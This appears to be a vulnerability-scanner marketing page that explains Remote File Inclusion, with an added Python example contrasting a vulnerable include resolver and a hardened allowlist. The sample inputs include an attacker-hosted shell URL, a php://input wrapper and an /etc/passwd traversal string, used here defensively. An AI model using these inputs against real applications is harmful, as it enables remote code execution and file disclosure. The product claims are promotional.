Remote File Inclusion (RFI) vulnerabilities are critical security issues in web applications, since successful exploitation may lead to Remote Code Execution (RCE). An RFI vulnerability allows an attacker to make the application include a file hosted on a web server the attacker controls, typically by supplying a URL in a request parameter that the application passes straight to an include function. In PHP the classic case is `include($_GET['page'])` with the `allow_url_include` setting enabled. Once the attacker's file has been included and executed, they will typically try to obtain a reverse shell, which gives them a command-line session on the server where arbitrary commands can be executed.
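To make the vulnerable pattern and its fix concrete, here is an added example (not code from the original page or from Acunetix) that models an include resolver in Python. The first function keeps the vulnerable shape, trusting the user-controlled value exactly as `include($_GET['page'])` does; the second maps the value onto a fixed allowlist and rejects anything that carries a URL scheme, stream wrapper or path characters. The allowlist, function names and sample inputs are constructed for illustration.

```python
"""Added example: an include resolver in its RFI-prone form and a hardened form."""
from urllib.parse import urlsplit

# Constructed allowlist: the only pages this (hypothetical) application may include.
ALLOWED_PAGES = {
    "home": "pages/home.php",
    "about": "pages/about.php",
    "contact": "pages/contact.php",
}


def resolve_include_vulnerable(page: str) -> str:
    """Vulnerable: returns the user-controlled value untouched, like include($_GET['page']).

    With remote includes enabled, a value such as
    'http://attacker.example/shell.txt' is fetched from the attacker's server
    and executed by the application.
    """
    return page


def is_remote_or_wrapper(value: str) -> bool:
    """True when the value looks like a URL or stream wrapper.

    Catches http://, https://, ftp://, php://, data://, expect:// and also
    scheme-less protocol-relative forms such as //host/file.
    """
    parts = urlsplit(value)
    return bool(parts.scheme or parts.netloc)


def resolve_include_hardened(page: str) -> str:
    """Hardened: only allowlisted page names resolve; everything else raises.

    The allowlist alone would already block remote includes, but the explicit
    checks make the rejection reason visible in logs and protect any later
    code path that might build a filename from the value.
    """
    if not isinstance(page, str) or not page:
        raise ValueError("missing page parameter")
    if is_remote_or_wrapper(page):
        raise ValueError(f"rejected remote or wrapper include: {page!r}")
    if any(bad in page for bad in ("/", "\\", "..", "\x00")):
        raise ValueError(f"rejected path characters in: {page!r}")
    try:
        return ALLOWED_PAGES[page]
    except KeyError:
        raise ValueError(f"unknown page: {page!r}") from None


def try_resolve(page: str) -> tuple:
    """Convenience wrapper: (True, path) on success, (False, reason) on rejection."""
    try:
        return True, resolve_include_hardened(page)
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Constructed sample parameter values, from benign to RFI attempts.
    samples = [
        "about",
        "http://attacker.example/shell.txt",
        "php://input",
        "../../etc/passwd",
        "admin",
    ]
    for value in samples:
        print(f"{value!r:40} vulnerable -> {resolve_include_vulnerable(value)!r}")
        print(f"{'':40} hardened   -> {try_resolve(value)}")
```

On a real PHP deployment the allowlist is the fix in the application; setting `allow_url_include=Off` (and, where the application does not need it, `allow_url_fopen=Off`) in `php.ini` is defence in depth that removes the remote-fetch capability entirely, so that even a missed include site cannot pull code from an attacker's server.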
RFI vulnerabilities are usually not difficult to fix, but finding them in large codebases can be challenging without the right tools. Acunetix is a web application vulnerability scanner which, in addition to RFI, tests for Local File Inclusion (LFI) and other file inclusion bugs, as well as Cross-site Scripting (XSS), SQL Injection (SQLi) and thousands of other vulnerabilities and misconfigurations.
Beyond low-hanging fruit
Runtime source code analysis
In addition to being a fully automated black-box scanner (requiring no knowledge of the backend code), Acunetix also provides AcuSensor as part of its standard offering. AcuSensor is an optional sensor for Java, ASP.NET and PHP applications that can be deployed on the application's backend to analyse the source code while it is being exercised by the scanner, giving more accurate results and fewer false positives.
We utilize Acunetix to more thoroughly assess internet-facing websites and servers. Acunetix helps us identify vulnerabilities in conjunction with other vulnerability scanning applications. Acunetix has been a more reliable application when discovering/determining different types of malicious code injection vulnerabilities (SQL, HTML, CGI, etc.).